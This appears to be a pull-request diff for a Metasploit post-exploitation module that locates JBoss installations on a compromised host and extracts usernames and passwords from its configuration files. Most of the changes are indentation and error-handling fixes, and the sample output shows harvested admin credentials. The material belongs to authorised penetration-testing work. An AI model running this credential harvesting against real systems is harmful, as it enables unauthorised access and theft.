-          xml2  = Nokogiri::XML(read_file(file2))
+          xml2 = Nokogiri::XML(read_file(file2))
         rescue
-          print_error("Cannot open #{array[i]}, you probably don't have permissions to open the file.")
+          print_error("Cannot open #{file2}, you probably don't have permissions to open the file.")
           next
         end
         xml2.xpath("//Server//Connector").each do |connector|
@@ -206,17 +207,17 @@ class MetasploitModule < Msf::Post
   def winhome
     home = []
     exec = cmd_exec('WMIC PROCESS get Caption,Commandline').split("\n")
-      exec.each do |line|
-        if line.downcase.include? "java.exe" and line.downcase.include? "jboss"
-          print_status('Jboss service found')
-          parse = line.split('-classpath "')[1].split("\\bin\\")[0]
-          if parse[0] == ';'
-            home.push(parse.split(';')[1])
-          else
-            home.push(parse)
-          end
+    exec.each do |line|
+      if line.downcase.include? "java.exe" and line.downcase.include? "jboss"
+        print_status('Jboss service found')
+        parse = line.split('-classpath "')[1].split("\\bin\\")[0]
+        if parse[0] == ';'
+          home.push(parse.split(';')[1])
+        else
+          home.push(parse)
         end
       end
+    end
     return home
   end
 
@@ -224,26 +225,26 @@ class MetasploitModule < Msf::Post
     instances = []
     instance_location = "#{home}\\server"
     exec = cmd_exec("cmd /c dir #{instance_location}").split("\n")
-    exec.each do |instance|
-     if instance.split("<DIR>")[1]
-       if (not instance.split("<DIR>")[1].strip.include? ".") and (not instance.split("<DIR>")[1].strip.include? "..")
-         instance_path = "#{home}\\server\\#{(instance.split("<DIR>")[1].strip)}"
-         if instance_path.include? version
-           instances.push(instance_path)
-         end
-       end
-     end
-    end
+      exec.each do |instance|
+        if instance.split("<DIR>")[1]
+          if (not instance.split("<DIR>")[1].strip.include? ".") and (not instance.split("<DIR>")[1].strip.include? "..")
+            instance_path = "#{home}\\server\\#{(instance.split('<DIR>')[1].strip)}"
+            if instance_path.include? version
+              instances.push(instance_path)
+            end
+          end
+        end
+      end
     return instances
   end
 
   def winpwfiles(instances)
     files = []
     instances.each do |seed|
-     file_path = "#{seed}\\conf\\props\\jmx-console-users.properties"
-     if exist?(file_path)
-       files.push(file_path)
-     end
+      file_path = "#{seed}\\conf\\props\\jmx-console-users.properties"
+      if exist?(file_path)
+        files.push(file_path)
+      end
     end
     return files
   end
@@ -308,10 +309,14 @@ class MetasploitModule < Msf::Post
   end
 
   def run
-    if sysinfo['OS'].include? "Windows"
-      gatherwin
-    else
-      gathernix
+    begin
+      if sysinfo['OS'].include? "Windows"
+        gatherwin
+      else
+        gathernix
+      end
+    rescue
+      print_error('sysinfo function not available, you are probably using a wrong meterpreter.')
     end
   end
 end


### PR DESCRIPTION
jboss_gather is a module that can extract usernames and passwords for jboss services on a linux or windows machine.

## Verification

List the steps needed to make sure this thing works

- [x] Have an existing meterpreter session
- [x] use post/multi/gather/jboss_gather
- [x] set session X
- [x] run
```
 Unix OS detected, attempting to locate Jboss services
   Found a Jboss installation version:4
  Bind file found: /home/reaper/jboss-4.2.3.GA/server/all/deploy/jboss-web.deployer/server.xml
  Bind file found: /home/reaper/jboss-4.2.3.GA/server/default/deploy/jboss-web.deployer/server.xml
  Username: admin Password: admin
  Username: admin Password: admin
  Post module execution completed
```